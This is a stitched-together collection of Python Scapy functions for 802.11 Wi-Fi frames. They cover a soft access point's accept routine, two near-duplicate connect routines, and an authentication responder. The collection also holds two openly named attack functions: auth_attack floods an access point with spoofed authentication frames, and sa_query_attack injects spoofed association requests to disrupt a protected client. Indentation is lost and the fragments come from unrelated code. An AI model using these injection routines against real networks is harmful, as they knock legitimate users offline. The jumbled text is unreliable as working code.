def accept(self):
"""
This is called after the listen() call and sets up the
ClientListener, which will respond to probe requests.
This method can (and often will be) called multiple times. It
returns a new WirelessStateMachine instance, pre-configured for
communication with the client machine. The client will already
be associated with the PythonSoftAP. The WirelessStateMachine
instance that is returned also contains an attribute of
"clientDescriptor" which contains a WirelessClient instance that
describes it.
The Dot11 Authentication frames and Dot11 Association frames are
transfered in this call, implying the main calling thread is
blocking. It is possible that the ClientListener thread may
queue multiple clients that are attempting to associate with the
PythonSoftAP but may be lost if accept() is not called again
before the clients timeout.
"""
if self.__shutdown__:
return
if not hasattr(self, 'client_listener'):
self.client_listener = ClientListener(self.interface, self.backlog,
self.essid, self.bssid)
self.client_listener.setPrivacy(self.privacy)
self.client_listener.start()
while not self.__shutdown__:
if self.client_listener.client_queue.empty():
continue
clientMAC = self.client_listener.client_queue.get(True, 1)
sockObj = WirelessStateMachine(self.interface, self.bssid,
self.source_mac, clientMAC)
sockObj.clientDescriptor = WirelessClient(self.bssid, clientMAC)
tries = self.max_tries
sockObj.send(Dot11Auth(seqnum=2), 0, 11, 0, True)
while tries:
tries -= 1
data = sockObj.recv()
if not data:
continue
if data.haslayer('Dot11AssoReq'):
break
elif data.haslayer(Dot11Auth):
sockObj.send(Dot11Auth(seqnum=2), 0, 11, 0, True)
sockObj.send(self.asso_resp_data, 0, 1, 0x10, True)
return sockObj, clientMAC
def auth_attack(interface, sta, ap):
pkt = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \
Dot11Auth(algo=0, seqnum=0x0001, status=0x0000)
while True:
cprint("ZZZ", 'blue')
interface.inject(pkt)
pkt.SC += 1
sleep(0.3)
def send_auth_response(self, pkt):
# Save client MAC for later
self.client = pkt.addr2
log_runtime.warning("Client %s connected!", self.client)
# Launch DHCP Server
self.dhcp_server.run()
rep = RadioTap()
rep /= Dot11(addr1=self.client, addr2=self.mac, addr3=self.mac)
rep /= Dot11Auth(seqnum=2, algo=pkt[Dot11Auth].algo,
status=pkt[Dot11Auth].status)
self.send(rep)
def sa_query_attack(interface, ap, sta):
pkt = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \
Dot11Auth(algo=0, seqnum=0x0001, status=0x0000)
interface.inject(pkt)
pkt = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \
Dot11AssoReq(cap=0x3104, listen_interval=0x0001) / Dot11Elt(ID=0, info="Wireless Attack Testbed") / \
Dot11EltRates() / Dot11Elt(ID='RSNinfo', info=(
'\x01\x00' # RSN Version 1
'\x00\x0f\xac\x04' # Group Cipher Suite : 00-0f-ac CCMP
'\x01\x00' # 2 Pairwise Cipher Suite (next line)
'\x00\x0f\xac\x04' # AES Cipher
'\x01\x00' # 1 Authentication Key Managment Suite (line below)
'\x00\x0f\xac\x02' # Pre-Shared Key
'\x80\x00')) # Supports MFP
interface.inject(pkt)
def connect(self, essid, rsnInfo=''):
"""
Connect/Associate with an access point.
errDict = {
-1:"Already Connected",
0:"No Error",
1:"Failed To Get Probe Response",
2:"Failed To Get Authentication Response",
3:"Failed To Get Association Response",
4:"Authentication Request Received Fail Response",
5:"Association Request Received Fail Response"
}
"""
# Dot11 Probe Request (to get authentication information if applicable)
payload = (RadioTap() / Dot11(
addr1=self.dest_mac, addr2=self.source_mac, addr3=self.dest_mac) /
Dot11Auth(seqnum=1))
self.__thread_sendp__(payload)
if rsnInfo is None: # None explicitly means go get it, leave it '' to proceed with out it
rsnInfo = self.get_rsn_information(essid)
if self.lastpacket is None or not self.lastpacket.haslayer(Dot11Auth):
return 2
if self.lastpacket.getlayer(Dot11Auth).status != 0:
return 4
#Dot11 Association Request
payload = (RadioTap() / Dot11(addr1=self.bssid,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__fixSC__(),
subtype=0) /
Dot11AssoReq(cap='ESS+short-preamble+short-slot',
listen_interval=10) /
Dot11Elt(ID=0, info=essid) /
Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c') /
Dot11Elt(ID=50, info='\x0c\x12\x18\x60') / rsnInfo)
self.__thread_sendp__(payload)
if self.lastpacket is None or not self.lastpacket.haslayer(
Dot11AssoResp):
return 3
if self.lastpacket.getlayer(Dot11AssoResp).status != 0:
return 5
self.connected = True
self.sequence = 0
return 0
def connect(self, essid, rsnInfo=''):
"""
Connect/Associate with an access point.
errDict = {
-1:"Already Connected",
0:"No Error",
1:"Failed To Get Probe Response",
2:"Failed To Get Authentication Response",
3:"Failed To Get Association Response",
4:"Authentication Request Received Fail Response",
5:"Association Request Received Fail Response"
}
"""
# Dot11 Probe Request (to get authentication information if applicable)
if rsnInfo is None: # None explicitly means go get it, leave it '' to proceed with out it
rsnInfo = self.getRSNInformation(essid)
# Dot11 Authentication Request
sendp(RadioTap() / Dot11(addr1=self.dest_mac,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__unfuckupSC__()) /
Dot11Auth(seqnum=1),
iface=self.interface,
verbose=False)
self.sequence += 1
sniff(iface=self.interface,
store=0,
timeout=self.timeout,
stop_filter=self.__stopfilter__)
if self.lastpacket is None or not self.lastpacket.haslayer(
'Dot11Auth'):
return 2
if self.lastpacket.getlayer('Dot11Auth').status != 0:
return 4
# Dot11 Association Request
sendp(RadioTap() / Dot11(addr1=self.bssid,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__unfuckupSC__(),
subtype=0) /
Dot11AssoReq(cap='ESS+short-preamble+short-slot',
listen_interval=10) / Dot11Elt(ID=0, info=essid) /
Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c') /
Dot11Elt(ID=50, info='\x0c\x12\x18\x60') / rsnInfo,
iface=self.interface,
verbose=False)
self.sequence += 1
sniff(iface=self.interface,
store=0,
timeout=self.timeout,
stop_filter=self.__stopfilter__)
if self.lastpacket is None or not self.lastpacket.haslayer(
Dot11AssoResp):
return 3
if self.lastpacket.getlayer(Dot11AssoResp).status != 0:
return 5
self.connected = True
self.sequence = 0 # reset it
return 0
def auth_frame_blueprint(self, ap, cl):
return RadioTap() / Dot11(addr1=ap, addr2=cl,
addr3=ap) / Dot11Auth(seqnum=1)